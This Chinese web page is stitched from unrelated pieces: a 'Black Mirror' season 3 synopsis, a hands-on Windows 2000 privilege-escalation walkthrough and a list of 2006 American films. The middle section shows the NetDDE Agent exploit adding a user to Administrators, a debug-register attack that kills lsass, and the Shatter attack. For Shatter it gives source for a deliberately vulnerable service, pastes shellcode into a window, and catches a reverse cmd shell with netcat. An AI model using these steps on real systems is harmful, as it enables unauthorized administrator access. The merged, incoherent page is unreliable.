文章目录:
《黑镜》第三季简介?
《黑镜》(Black Mirror)是英国电视4台(Channel 4)及美国NetFlix公司出品的迷你电视剧。由英国制片人查理·布洛克编剧及制作,包括第一季、第二季、圣诞特辑和第三季构成 。
该剧分别以多个建构于现代科技背景的独立故事,表达了当代科技对人性的利用、重构与破坏 。
该剧第一季于2011年12月播出,第二季于2013年2月13日播出,圣诞特辑于2014年12月6日在英国首播 。第三季于2016年10月21日开播 。
莱西(布莱丝·达拉斯·霍华德 Bryce Dallas Howard 饰)生活在一个十分看重个人评分的世界之中,在这个世界里,你可以给你遇到的所有人打分,自身分数越高的人,给他人打分的权重就越高。每个人的分数决定了他们能够过上怎样的生活。
库珀(瓦耶特·鲁塞尔 Wyatt Russell 饰)是一位喜欢游历世界的青年,某次,旅费吃紧的他参加了一项游戏测试的工作,没想到这份收入优渥的工作却给他的人生带来了毁灭性的打击。
内向木讷的男孩肯尼(亚历克斯·劳瑟 Alex Lawther 饰)发现自己的一举一动均被他人所监视着,为了守住秘密不被泄露,肯尼成为了黑客肆意操纵的傀儡。
风景优美的圣朱尼佩罗,内向平凡的女孩约克夏(麦肯兹·戴维斯 Mackenzie Davis 饰)邂逅了光芒四射的凯丽(古古·玛芭塔劳 Gugu Mbatha-Raw 饰),两人之间产生了一段美好的感情。
被植入了“感知封闭系统”的士兵,他们要对抗的真正敌人究竟是什么?
臭名昭著的撰稿人莫名死亡,在调查事件真相的过程中,警方一步步走入了黑客一手制造的陷阱之中。
总之,这是一部很值得期待的电影。
NetDDE Agent是什么东西?
NetDDE Agent",是一个"NDDEAgnt"类的window class,它的功能在于协助DDE Server程序及DDE Client程序之间的数据交换。由于它由Winlogon创建,这个Window的进程就以Local System的权限运行在登录用户的Desktop上,只不过用户看不到它而已。
"NetDDE Agent"还有另外一个辅助功能:当DDE Client试图连接到一个Trueted的DDE Share时,如果"NetDDE Agent"发现创建这个DDE Share的DDE Server尚未运行,它会主动启动这个Server。记住"NetDDE Agent"进程是具有Local System权限的,所以它启动Server没有一点问题。
根据DilDog的研究,这个隐藏式的"NetDDE Agent"就是一个缺口(Vulerability)!还记得Window操作系统中的函数SendMessage()吗?登录用户可以利用这个函数向Desktop上的任何Window发送Message,即使这个Window不属于当前登录用户。所以黑客在以一般用户的身份登录后,可以用SendMessage()发送一个WM_COPYDATA message给"NetDDE Agent",这个Message里面同时携带着一个精心炮制的数据块作为调用参数。这个数据块包含以下内容:
1。 一个Trusted DDE Share的名字,比如说Chat$;
2。 一个用于启动DDE Server的命令,如果"NetDDE Agent"发现创建Chat$的DDE
Server尚未运行,就根据这个命令来启动DDE Server。但是黑客可以任选一个命 令来伪造,比如说“Net Localgroup Administrators /Add 阿猫”----这里的阿 猫已经是合法的一般用户了;
3。 一些固定不变的字节。DilDog认为是这些字节应该是随机产生的,而不应该固定不变。我个人理解这些字节是用于向"NetDDE Agent"或Network DDE DSDM证明WM_COPYDATA message是由合法程序(而不是黑客程序)发出的,所以它们应该随机变化而不让黑客轻易得到。
当"NDDEAgnt"接收到WM_COPYDATA message时,它核对后会发现第三部分的字节正确无误,而且Trusted DDE Share确实存在,於是它就执行黑客命令,由于"NDDEAgnt"具有Local System权限,它可以顺利地让阿猫同志光荣地加入本地Administrator Group。
DilDog在文章中还附带了一个Exploit程序netddemsg,我接下来就在dallas上演示一下我自己是如何追随阿猫加入本地Administrators Group的:
/*
先以我的用户账号“moda”登录dallas。
看看本地administrators Group有哪些成员:
*/
D:\MyJob\securitylab\netddemsg\Debugnet localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the Members
-----------------------------------------------------------------------------
a_mao
Administrator
The command completed successfully.
/*
本地administrators Group目前只有两个成员,Administrator和a_mao。试着把“moda”加入到本地administrators Group中:
*/
D:\MyJob\securitylab\netddemsg\Debugnet localgroup administrators /add moda
System error 5 has occurred.
Access is denied.
/*
我的权限显然不够,所以得到error 5。
运行DilDog的Exploit程序,同时附带上我的黑客命令:
*/
D:\MyJob\securitylab\netddemsg\Debugnetddemsg -s Chat$
net localgroup administrators /add moda
/*
程序运行结束,让我们看看“moda”是否加入本地administrators Group:
*/
D:\MyJob\securitylab\netddemsg\Debug
D:\MyJob\securitylab\netddemsg\Debugnet localgroup
administrators
Alias name administrators
Comment Administrators have complete and unrestricted
access to the
Members
-----------------------------------------------------------------------------
a_mao
Administrator
moda
The command completed successfully.
D:\MyJob\securitylab\netddemsg\Debug
/*
我也光荣地加入了本地administrators Group
*/
利用Windows 2000/Intel中的Debug Register来提升权限:
我是在Georgi Guninski的个人网站)上看到这篇文章:
“Elevation of Privileges with debug registers on Win2k”,介绍如何利用Intel X86中的Debug Register来获取Local Administrator的权限。我的运气不太好,用文章中的Exploit程序Pipe3试了几次也不能成功,不过觉得利用Debug Register来攻击是个新的思路,所以就在这里顺便介绍一下。
Intel X86的Debug Register(DR0-DR7寄存器)是所有进程共用的。也就是说,你在一般用户进程中下一个绊子(就是设置一个断点),没准会把某个系统进程或者服务进程(Service)绊一跤;这一跤要是把系统/服务进程摔垮了,导致它停止执行的话,你没准就可以伪造该进程的Named Pipe;然后当有其它进程企图通过Named Pipe与垮掉的系统/服务进程联络时,黑客就可以利用函数ImpersonateNamedPipeClient来窃取其它进程的权限----这很可能就是Local SSystem的权限。
文章中的Exploit程序Pipe3(请从网下载)就是按照这个思路设计的:它要整垮的进程是lsass,所以必须先找几个lsass进程将要运行的指令的地址,以便在这些地址设置断点(也就是搞清楚lsass要走哪一条路,我们才好在那条路上设绊脚石);然后Pipe3以一般用户的权限运行程序Calc(计算器),并在其中设置断点,因为这断点的地址是在lsass运行的途径上,所以它们并不会影响Calc进程;过不了多久lsass就会有报告“SingleStep Exception”并让你选择是中断lsass运行还是Debug lsass进程;选择中断lsass以便关闭lsass拥有的Named Pipe----\ '5c.\pipe\lsass",这样Pipe3就可以伪造一个同名的Named Pipe;。。。。。。这以后的几步我想就不用重复了,大家都应该清楚。下面说说我Exploit的情况:
先用WinDbg找到lsass可能要运行的指令地址,lsass有多个Thread,我从不同Thread的ESP寄存器中找了几个地址。然后以我的一般用户名“moda”登录dallas。最后让Pipe3在这些地址分别设断点,总有那么一个地址会成功地中断lsass程,并且产生一个Warning对话框(Dialog Box)报告“SingleStep Exception”。当我选择中断进程后,lsass退出执行,Pipe3报告“LSA died!”:
D:\MyJob\securitylab\pipe3\Debugpipe3
Fun with debug registers. Written by Georgi Guninskivvdr started: lsasspid=240 breakp=5ffebc
LSA died!
Stop writing to pipe
start \\.\pipe\lsass
Failed to create named pipe:
\\.\pipe\lsass
由于lsass是重要的系统进程,它的终止运行将使系统在一分钟内自动Shutdown。另外我们注意到,\\.\pipe\lsass并没有成功地创建。为什么呢?我抢在系统Shutdown之前运行了一下Pipelist:
D:\MyJob\securitylab\pipe3\Debugpipelist
PipeList v1.01
by Mark Russinovich
Pipe Name Instances Max Instances
--------- --------- -------------
InitShutdown 2 -1
lsass 2 -1
ntsvcs 49 -1
scerpc 2 -1
net\NtControlPipe1 1 1
DhcpClient 1 -1
net\NtControlPipe2 1 1
。。。。。。。。。。。。。。。。
很奇怪,虽然lsass进程终止运行,但是它的Named PPipe还在----这大概是Pipe3没能创建“\\.\pipe\lsass”的原因。由于时间的关系,我没能深入研究这个问题,不过哪位朋友要是用Pipe3成功地实现Exploit的话,不要忘记告诉我一声!
不过话又说回来,这种利用Debug Register来终止lsass进程的方法----即使成功的话,也太暴露了:整个系统居然会Shutdown!任何一个傻瓜管理员都会发现有黑客入侵。这大概是黑客中的业余水平。好一点的黑客要做到“轻轻的我走了,正如我轻轻的来”,要象伟大的诗人兼武林高手徐自摩那样施展一把轻功,让傻瓜管理员根本发现不了,当然耳朵厉害的管理员还是会发现的----“谁?有黑客!抓黑客!”。水平达到最高境界的黑客应该是能够羚羊挂角、踏雪无痕的,这就不是我能评论的了。
利用Win32 API的设计缺陷提升权限:
几个星期以前我在计算机安全网站上看到两篇新发表的文章:、,作者是Chris
Paget(网名Foon),我建议大家去下面的网址读一下他的原著:
。
这两篇文章详细地介绍了如何利用Win32 API的一个设计缺陷来提升普通用户的权限。我们前面也提到,普通用户的进程可以向他/她的Desktop上任何Window发送Message,让目标Window执行用户指定的操作,比如说COPY/PASTE(拷贝/沾贴)、定时运算(Timer)等等。这个Window可能属于用户自己,也可能属于Local System(象"NetDDE Agent")----这样问题就来了:
---- 普通用户如你我他她它(比尔盖茨说狗也可能上网的,所以我们要算上“它”)在他的Desktop上先找到一个属于Local System的Window,我们给这个Window起一个名字叫WINDOWXYZ,这个WINDOWXYZ上最好有能接收沾贴内容的Control(比如说 EDIT);
---- 用户可以把黑客码用“WM_PASTE”(Message之一)沾贴到WINDOWXYZ的Control里;
---- 用户找到被沾贴的黑客码在WINDOWXYZ进程中的地址;
---- 用户然后发送“WM_TIMER”(Message之二)给WINDOWXYZ,同时把黑客码地址作为参数一并传给WINDOWXYZ,WINDOWXYZ於是执行定时运算,开始运行黑客码。这些 黑客码是以Local System的权限运行的,所以普通用户的权限被成功地提升。
---- 实际上,根据FOON的文章,即使普通用户在其Desktop上找不到属于Local System的Window,他也有办法提升权限:他可以利用Tool Help函数得到属于 Local System的进程及其Thread,只要其中任何一个Thread能处理Window的Message,用户就可以用函数PostThreadMessage()向这个属于Local System的Thread发送Message,然后就。。。如此这般。。。地提升权限。不过我没有时间 亲手试验过这种方法。
这两篇文章引起了很大的反响,其中最引人注意的是Microsoft的答复,Micorsoft说这种方法老早就有人提出来了,Nothing New!又说根本就不应该在普通用户的Desktop上创建属于Local System的Window,编程序的人应该避免这样的设计。但实际上隐藏式的窗口"NetDDE Agent"就出自于Microsoft的设计,它属于Local System但是却运行在登录用户的Desktop上,看来Microsoft是知法犯法啊!
我觉得这个缺陷就象不安全的函数strcpy一样,C语言在实现strcpy函数时有漏洞(函数返回地址、函数堆栈栈底地址等系统管理信息与缓冲区分配在一块,缓冲区的溢出就会覆盖系统管理信息),於是大家寄希望于程序员能够避免使用函数strcpy。现在Microsoft也承认在普通用户的Desktop上创建一个Window是危险的,所以它也寄希望于大家编程时避免使用这样的设计。
下面我专门编写了一个服务进程“SimpleService”来演示一下Microsoft的这个设计缺陷。SimpleService以Local System的权限运行,它打开一个Named Pipe然后等待Named Pipe Client与它联络;普通用户接着登录计算机并运行程序“Client”,“Client”是一个Named Pipe Client;它向SimpleService的Named Pipe随便写一些字节,於是SimpleService就在登录用户的Desktop上产生一个对话窗口(Dialog Box)。普通用户最后利用FOON的攻击程序Shatter攻击这个对话窗口来获得“Local System”的权限。
因为SimpleService程序太长,所以我只节选了关键的部分让大家参考:
====================SimpleService====================
#define SZAPPNAME _T("Simple")
#define SZSERVICENAME _T("SimpleService")
#define SZSERVICEDISPLAYNAME _T("Simple Service")
#define SZDEPENDENCIES _T("")
typedef struct DLGPARAM{
UINT numOfHit;
TCHAR *msg;
} DlgParam;
// internal function prototypes
static BOOL CALLBACK DialogProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam);
// SimpleService.cpp : Defines the entry point for the
application.
//
HINSTANCE hAppInstance;
DlgParam m_dlgParam;
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
......
}
void WINAPI service_main()
{
......
}
VOID WINAPI service_ctrl(DWORD dwCtrlCode)
{
......
}
BOOL WINAPI ControlHandler ( DWORD dwCtrlType )
{
......
}
HANDLE hServerStopEvent = NULL;
VOID ServiceStart ()
{
......
......
hPipe = CreateNamedPipe(
lpszPipeName , // name of pipe
FILE_FLAG_OVERLAPPED
PIPE_ACCESS_DUPLEX, // pipe open mode
PIPE_TYPE_MESSAGE
PIPE_READMODE_MESSAGE
PIPE_WAIT, // pipe IO type
1, // number of instances
0, // size of outbuf
file://(0 == allocate as necessary)
0, // size of inbuf
1000, // default time-out value
sa); // security attributes
......
......
while ( 1 )
{
......
......
ConnectNamedPipe(hPipe, os);
......
......
bRet = ReadFile(
hPipe, // file to read from
szIn, // address of input buffer
sizeof(szIn), // number of bytes to read
cbRead, // number of bytes read
os); // overlapped stuff, not needed
......
......
_stprintf(szOut, _T("Please check the Dialog Box"));
_stprintf(szOut1, _T("Eacho Back! [%s]"), szIn);
......
......
bRet = WriteFile(
hPipe, // file to write to
szOut, // address of output buffer
sizeof(szOut), // number of bytes to write
cbWritten, // number of bytes written
os); // overlapped stuff, not needed
......
......
DisconnectNamedPipe(hPipe);
m_dlgParam.numOfHit++;
m_dlgParam.msg = szOut1;
/*
在登录用户的Desktop上创建一个窗口
*/
int result = DialogBoxParam(hAppInstance,
MAKEINTRESOURCE(IDD_SVCMSG),
NULL,
(DLGPROC) DialogProc,
(LPARAM) m_dlgParam);
}
cleanup:
......
......
}
VOID ServiceStop()
{
if ( hServerStopEvent )
SetEvent(hServerStopEvent);
}
#define SIZEOFBUF 40
/*
Window的Message Handler
*/
BOOL CALLBACK DialogProc(HWND hwnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
DlgParam* l_pDlgParam = (DlgParam*) lParam;
CHAR tempBuf[SIZEOFBUF];
switch (uMsg)
{
case WM_INITDIALOG:
{
HWND hNumVisit = GetDlgItem(hwnd, IDC_NUMHIT); /*限定Edit Control的尺寸(Size)为3*/
SendMessage( hNumVisit, EM_LIMITTEXT, (WPARAM) 3,
(LPARAM)0);
_itoa(l_pDlgParam-numOfHit, tempBuf,10);
SendMessage(hNumVisit, WM_SETTEXT, (WPARAM)
0,(LPARAM)tempBuf);
HWND hMsg = GetDlgItem(hwnd, IDC_MSG);
/*限定Edit Control的尺寸(Size)为40*/
SendMessage( hMsg, EM_LIMITTEXT, (WPARAM) SIZEOFBUF,
(LPARAM)0);
SendMessage( hMsg, WM_SETTEXT, (WPARAM) 0,
(LPARAM) l_pDlgParam-msg );
SetForegroundWindow(hwnd);
return FALSE;
}
case WM_COMMAND:
{
switch (LOWORD(wParam))
{
case IDC_OK:
EndDialog(hwnd, IDC_OK);
return FALSE;
default:
return FALSE;
}
}
}
return FALSE;
}
===============================================
下面是程序Client.c,非常简单,它的功能仅仅是向“\\.\pipe\simple”发送几个字节:
=======================Client========================
// client.cpp : Defines the entry point for the console
application.
//
#include
#include
#include
#include
int main(int argc, char* argv[])
{
char inbuf[80];
char outbuf[80];
DWORD bytesRead;
BOOL ret;
LPSTR lpszPipeName = "\\\\.\\pipe\\simple";
LPSTR lpszString = "World";
strcpy( outbuf, lpszString );
ret = CallNamedPipeA(lpszPipeName,
outbuf, sizeof(outbuf),
inbuf, sizeof(inbuf),
bytesRead, NMPWAIT_WAIT_FOREVER);
if (!ret) {
printf("client: CallNamedPipe failed for %d\n",
GetLastError());
exit(1);
}
printf("client: received: %s\n", inbuf);
return 0;
}
==================================================
FOON编写了一个攻击工具Shatter,大家可以参考他的文章来使用这个工具,而且他的网站上还有Shatter的源程序。这个程序专门攻击象SimpleService这样会创建Window的服务进程,它首先把Window中Edit Control的尺寸(Size)扩大,然后把可执行的黑客码沾贴到Edit中,这样就把黑客码拷贝到这个Window进程的内存中了----很Cool吧!接下来我们就要寻找黑客码在内存中的地址,FOON是用Windbg去寻找这个地址的,详情请参考他的文章。最后Shatter向Window进程发送一个定时执行Message----“WM_TIMER”,迫使Window进程执行刚才拷贝进去的黑客码。这个黑客码是根据jill的黑客码改编而成,它产生一个远程的cmd shell联结回到Client机器上,所以我们可以用鼎鼎有名的netcat程序与它联络。
我现在来演示一下使用Shatter攻击SimpleService的过程,看看普通用户“moda”是如何通过Shatter提升权限的:
先以普通用户“moda”登录,看看本地Administrators组当前的成员:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
D:\MyJob\tool\netcatnet localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the Members
-----------------------------------------------------------------------------
Administrator
The command completed successfully.
本地Administrators组只有Administrator一个成员。我们试一下能不能把“moda”加入到本地Administrators组。
D:\MyJob\tool\netcatnet localgroup administrators /add moda
System error 5 has occurred.
Access is denied.
很惨呀,得了一个“Access is denied.”的错误。
下面运行程序Client,向SimpleService发送几个字节,於是SimpleService在普通用户“moda”的Desktop上产生一个对话框:
这个对话框上有两个Edit Controls,一个对应着“Number Of Hit”,这里输出SimpleService的Named Pipe被访问的次数;一个对应着“Message Back”,这里输出SimpleService的Message。这两个Edit都可以被攻击利用,不过我这里以“Message Back”的Edit为例。让我们运行FOON的攻击程序Shatter:
第一步:我们需要扩大Edit的尺寸(Size)。大家从SimpleService的源程序中可以看到,“Message Back”的Edit只允许40个char,而jill的黑客码显然超过了这个长度,所以我们就通过Shatter向这个Edit的柄Handler发送EM_SETLIMITEXT,把它的尺寸扩大到0xffffffff(见下图)。
第二步:把FOON改编的jill黑客码拷贝到Clipboard上,然后往Edit发送WM_PASTE,你可以看到Edit中马上堆积了一长串乱七八糟的字符,这就是jill黑客码。
第三步:利用Windbg去寻找jill黑客码在Window内存中的地址,这个过程FOON已经讲得很清楚了,所以就不用我罗嗦了。在dallas上我得到的地址是在0x1389c0附近。
第四步:另外打开一个Dos窗口运行netcat,我们准备与打入敌营的侦察兵jill联络:
D:\MyJob\tool\netcat
D:\MyJob\tool\netcatnc -lp 123
第五步:向Edit发送WM_TIMER,让Window进程跳去执行从0x1389c0开始的黑客码。你马上就能看到netcat开始收到了jill发回来的内容,它输出一些版权信息。
D:\MyJob\tool\netcat
D:\MyJob\tool\netcatnc -lp 123
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
第六步: 现在你就可以通过netcat与Window进程中的cmd Shell联系,可以向它发送命令,从它那里得到命令运行结果。这个cmd Shell具有Local System的权限,所以我们可以轻易地把普通用户“moda”加入到本地Administrators组中:
D:\WINNT\system32net localgroup administrators /add moda
net localgroup administrators /add moda
The command completed successfully.
D:\WINNT\system32net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the Members
-----------------------------------------------------------------------------
Administrator moda
The command completed successfully.
D:\WINNT\system32
D:\WINNT\system32
以上就是我演示Microsoft这个缺陷的过程,虽说我有意把SimpleServic设计得易于黑客攻击,但实际上还有不少的流行的程序也是犯了同样的错误,象FOON文章中提及的Network Associates VirusScan v4.5.1, 还有我最喜欢用的WinVNC等等,它们都在普通用户的Desktop上创建了一个具有Local System权限的Window。
好看的美国电影!推荐几个
《谍中谍3》
Mission:Impossible 3
上映日期:2006年5月5日
主演:汤姆.克鲁斯
凯莉.安.摩丝
导演:J.J.艾布拉姆斯
类型:神秘/惊悚/冒险/动作
发行公司:派拉蒙
《谍中谍》又有新片出来了,这次由曾任热门系列剧《Alias》(双面女间谍)策划的J.J.艾布拉姆斯执导这部大制作,而汤姆.克鲁斯依然担当他的大英雄角色,接受不可能完成的任务。这次他会在电脑专家的帮助下成功消灭邪恶势力
1. 《吸血莱恩》BloodRayne
上映日期:2006年1月6日
主演:本.金斯利 阿杜.基尔
类型:动作/恐怖/荒诞
导演:乌维.鲍尔
发行公司:Romar Entertainment
之前曾经由欧洲Majesco公司跨Xbox、PS2以及PC等平台推出,以吸血鬼为题材的动作游戏《BloodRayne》,现在被德国电影公司Boll KG投入3000万美金拍摄成电影。女主角是《终结者3》中的“TX”美女终结者——克莉斯汀娜.罗肯,在片中扮演一个半人半吸血鬼的角色,为了复仇而计划推翻她的父亲——吸血鬼之王Kagan。
2.《黑夜传说2:进化》
Underworld: Evolution
上映日期:2006年1月20日
主演:凯特.贝金塞尔
德里克.雅克比
导 演:伦.维斯曼
类型:剧情/恐怖/动作/奇幻
发行公司:SONY
大家还记得《黑夜传说》吗?这是一部比较另类的吸血鬼题材电影,卖点是美女与暴力美学。小编看过,虽然不算最好看,但影片整体来说还是挺刺激的。2006年上映的是第2部——《黑夜传说2:进化》,据说该系列接下来还要拍第3部——《黑夜传说前传》。喜欢片中女主角凯特.贝金塞尔的影迷可以大饱眼福了
3. 《逃脱死亡:死神来了3》
Cheating Death: Final Destination 3
上映日期:2006年2月10日
导 演:黄毅瑜
主 演:玛丽.文斯蒂德 赖安.梅丽曼
类型:剧情/恐怖
发行公司:新线影业
死神又来了,作为《死神》系列第三部电影,本片由《死神来了》、《救世主》和《X档案》的黄毅瑜(华裔导演)执导。随着温丝黛特扮演的高中学生温迪克林斯邓森展开,她预感到几个朋友坐过山车时将遇难,而避过了这一劫。她在对抗时间的赛跑中和同学凯文费舍组织在一起,防止死亡以及意外事故的方式再度降临在这些幸存者身上
4.《惊声尖笑4》
Scary Movie 4
上映日期:2006年4月14日
主演:安娜.法瑞丝 瑞吉娜.赫尔
导演:大卫.朱克
类 型:恐怖/喜剧
发行公司:温斯坦公司
这是《惊声尖笑》的第四部了。你还记得《惊声尖笑》的一大特色吗?那就是在片中影射时下热门的娱乐圈事件影片。所以《惊声尖笑4》仍然以重组经典电影场面的搞笑版本作为招徕绝技,以便能够用低成本在美国票房换得高回报
5. 《寂静岭》Silent Hill
上映日期:2006年4月21日
主演:拉达.米契尔 肖恩.宾
导演:里斯托弗.甘斯
类型:恐怖
发行公司:SONY
本电影完全改编自游戏,而且医院、异世界以及被烟雾笼罩的世界也将表现出来。罗斯背着丈夫,私自将重病的女儿带到神婆那儿寻求治疗。接着发生了很多奇怪的事情,首先,罗斯在毫无察觉的情况下穿过结界到了一个奇怪的世界,然后女儿也不见了。在寻找失落的女儿的过程中,她发现整个小镇充满着恐怖的恶魔,而且任何接触黑暗的事物都发生了扭曲变异,最后在警察的帮助下罗斯终于结束了这场可怕的梦魇
6.片 名: 水妖(暂译)
类 型: 幻想 / 悬念 / 惊悚 / 剧情
导 演: 奈特.沙马兰 M. Night Shyamalan
编 剧: 奈特.沙马兰 M. Night Shyamalan
主要演员: 保罗.吉亚玛提 Paul Giamatti
布莱斯.达拉斯.霍华德 Bryce Dallas Howard
罗伯.巴拉班 Bob Balaban
Rich Bryant
John Boyd
萨里塔.乔杜里 Sarita Choudhury
Ethan Cohn
上映日期: 2006-7-21
国家地区: 美国
剧情简介
印度籍好莱坞悬疑电影导演奈特.沙亚马兰(M. Night Shyamalan)的新作!一部带有魔幻色彩的悬疑惊悚片。影片灵感来自西方家喻户晓的神话故事,在西方神话里有一种生物叫海妖(或水妖),传说她们住在海、河或森林里,半神半人,通常以美丽少女的形象出现。影片就是讲述一幢公寓大楼的门卫在夜里巡逻时发现游泳池里的水妖的故事。
7. 《V字仇杀队》》
V for Vendetta
上映日期:2006年3月17日
主演:娜塔丽.波特曼 雨果.维文
类型:科幻/惊悚/剧情/动作
发行公司:华纳兄弟
影片根据著名作家阿兰.摩尔的同名绘本小说改编。故事发生在虚构的未来,假定德国赢得了第二次世界大战,英国因此而成为极权国家。一个代号为“V”的孤单英雄与女主角组成了黄金搭档,秘密从事颠覆极权的革命活动。本片由《黑客帝国》的华考斯基兄弟担任编剧
8. 《X战警3》X-MEN 3
上映日期:2006年5月26日
主演:休.杰克曼
帕特里克.斯图尔特
导演:布莱特.拉特纳
类型:动作/科幻
发行公司:20世纪福克斯
在最新的《X战警3》里,风暴女、X博士和金刚狼将继续对抗“万磁王”(前两部中的“金刚狼”休.杰克曼和“风暴女”哈利.贝瑞将继续出现在本片中)。这次联盟里又添新变种人——擅长引诱男人的变种美女。她对付异性敌人的招数不是动武,而是运用一股神秘力量来让男人乖乖就范。凯尔塞.格拉玛和维尼.琼斯则在其中分别饰演“野兽”和“神像”。据说,热门电视剧集《迷失》(lost)的麦姬.格雷斯也在洽谈出演“穿墙美女”基蒂.普莱德。这次,真是美女如云呀
9.《超人归来》Superman Returns
主演:布兰登.罗素 凯特.伯斯沃茨
导演:布莱恩.辛格
类型:科幻/动作/惊险
发行公司:华纳兄弟
这次是执导《X战警》的导演布莱恩.辛格担纲。超人的男主角已经被选定由年轻演员布兰登扮演。故事讲述超人消失了5年后终于回到地球,却发现他的爱人路易斯已经有了儿子和未婚夫。这五年间到底发生了什么?超人能重新拯救地球并挽回昔日恋情吗?戴上黑框眼镜的布兰登.罗素非常酷似前超人——克利斯托弗.里夫。而大家都知道,当年在老《超人》一片中扮演重要角色的两位知名演员——克里斯托弗.里夫和马龙.白兰度已经在刚刚过去的2004年中先后辞世,让我们通过新片来纪念这两名巨星吧
10.《侏罗纪公园4》
Jurassic Park 4
上映日期:2006年夏季
主演: 凯拉.奈莉 山姆.尼尔
制片:史蒂文.斯皮尔伯格
类型:冒险/惊悚/科幻/恐怖
发行公司:环球影业
一群倒霉人再次陷入侏罗纪公园。在这个恐龙的乐园里,人们面临新挑战
11. 《冰河世纪2:消融》
Ice Age 2: The Meltdown
上映日期:2006年3月31日
配音:雷.罗马诺 约翰.雷吉扎默
导演:卡洛斯.萨达纳
类型:动画/喜剧
发行公司:20世纪福克斯
本续集将继续延续第一集诙谐幽默的喜剧风格,一定是一部让你捧腹的动画大作。随着冰河世纪的趋于结束,所有幸存的生命都在欢欣鼓舞,但是随着冰川的快速融化,第一集中的三位主角——剑齿虎迭哥、树獭希德和长毛象曼尼生存的山谷面临着被洪水淹没的危险……三只动物只得担负起灾难前警告同伴撤退的艰巨任务
加勒比海盗2:死人胸膛》
Pirates of the Caribbean 2:Dead Man's Chest
上映日期:2006年7月7日
导 演:戈尔.弗宾斯盖
主 演:约翰尼.德普 奥兰多.布鲁姆 凯拉.奈特莉
类型:动作/冒险/奇幻
发行公司:迪斯尼
继去年上映的《加勒比海盗1——黑珍珠的诅咒》之后,约翰尼扮演的杰克船长发现他欠了会飞的荷兰人船长大卫琼斯一笔血债。随着时间的推移,杰克必须找出一个办法从这笔债务和永恒诅咒中摆脱出来。如果这还不够,船长的问题就是设法破坏威尔特纳和伊丽莎白斯沃恩的结婚计划,迫使他们加入杰克另一次依然运气欠佳的冒险行动。续集将更加突出骷髅海盗的主题,片中还将出现一条叫“克拉肯”的大乌贼和其他东西……而女主角凯拉.奈特莉在片中则会挥舞双剑,亲上战场。同时,《加勒比海盗3》也开始拍摄了,计划上映时间是2007年夏天,让我们继续期待吧
《伊拉贡》Eragon
(亦被译为《龙骑士》)
上映日期:2006年5月26日
上映日期:2006年12月15日
主演:德.斯皮里尔斯
约翰.马尔科维奇
导演:斯蒂芬.方米尔
类型:幻想/科幻/动作
发行公司:20世纪福克斯
《伊拉贡》根据同名小说改编而成,最为奇迹的是作者克里斯多弗.鲍里尼20岁不到,真是年轻有为呀。《伊拉贡》是《遗传三部曲》中的第一部,融入了诸如飞龙、战马、精灵、矮子等奇幻元素。在充满诡谲传说的大山之中,狩猎少年伊拉贡(Eragon)拾获一颗蓝色奇石。没想到,这颗石头竟孵出一只蓝色飞龙!伊拉贡为小龙命名为“萨菲拉”(Saphira),把她视为最亲密的朋友。但是,萨菲拉却为伊拉贡的亲人惹来杀身之祸。悲痛的伊拉贡为了复仇,开始学习魔法、剑术及古语,最终踏上艰辛的复仇之旅。本片导演斯蒂芬.方米尔是首次执导长片,此前他一直担任“工业光魔”公司的特效总监,得意作品包括《拯救大兵瑞恩》和《完美风暴》。
本能2之危险吸引力》
Basic Instinct 2: Risk Addiction
上映日期:2006年3月10日
主演:沙朗.斯通 大卫.莫瑞西
导演:迈克.卡顿.琼斯
类型:惊悚/犯罪/悬念
发行公司:米高梅/SONY
发行公司:20世纪福克斯
1992年的著名电影《本能》(Basic Instinct),是由沙朗.斯通和奥斯卡影帝迈克尔.道格拉斯(Michael Douglas)共同主演的。影片中一名调查谋杀案的警官与调查对象、一名性感的小说女作家之间发生了难以抗拒的感情关系。此片曾被誉为90年代最棒的色情惊悚片。而2006年上映的《本能2之危险吸引力》,则将涉及女性同性恋的内容,更加出位了。故事发生地从美国转换到了英国伦敦,沙朗.斯通仍担纲主演。讲述的是性感的小说家凯瑟琳.瑞美尔离开了旧金山来到伦敦。在那里,她与心理医生安德鲁的危险关系就此产生
达芬奇密码》
The Da Vinci Code
上映日期:2006年5月19日
主演:汤姆.汉克斯 让.雷诺
导演:罗恩.霍华德
类型:悬念/剧情/惊悚
发行公司:哥伦比亚影业
哈佛大学的符号学专家罗伯特.兰登(汤姆.汉克斯饰)在法国巴黎出差期间接到一个紧急电话,得知罗浮宫博物馆年迈的馆长被人杀害在罗浮宫的博物馆里,人们在他的尸体旁边发现了一个难以捉摸的密码。兰登与法国一位颇有天分的密码破译专家索菲.奈芙,在对一大堆怪异的密码整理的过程当中,发现一连串的线索就隐藏在达.芬奇的艺术作品当中
无间行者》《美国版无间道》
The Departed
上映日期:2006年12月31日
主演:莱昂纳多.迪卡普里奥
马特.达蒙
导演:马丁.斯科西斯
类型:犯罪/剧情
发行公司:华纳兄弟
这部影片是根据《无间道》改编的重拍片。与其不同的是,本片故事发生在美国波士顿,而犯罪分子也改成了黑手党。故事从上世纪七十年代开始。杰克.尼科尔森扮演的黑帮头子科斯特罗控制了整个波士顿的街区。年仅14岁的科林成为尼科尔森重点培养对象。与此同时,少年比利由于拒绝为科斯特罗效劳,被黑势力所迫害……科林和比利都已经长大成人之后,两人都当上了州警。但是科林(马特.达蒙扮演)依然听命于黑帮头子科斯特罗,他是警方中的卧底,而比利(莱昂纳多扮演)则希望当一个好警察,为父报仇雪恨。在成功打入波士顿有名的黑帮团伙——昆南,并一举歼灭之后,科林获得了提升。与此同时,科斯特罗的势力越来越大。警方遂决定派遣比利扮成黑帮分子前往调查黑帮卧底。随着时间的推移,敏感的科斯特罗也觉察到身边出现了警方卧底,于是警方和黑帮展开了洗底行动……
罪恶之城2》Sin City 2
上映日期:2006年夏季
主演:克里夫.欧文 布兰妮.墨菲
导演:罗伯特.罗德里格斯
类型:动作/犯罪
发行公司:韦恩斯坦公司
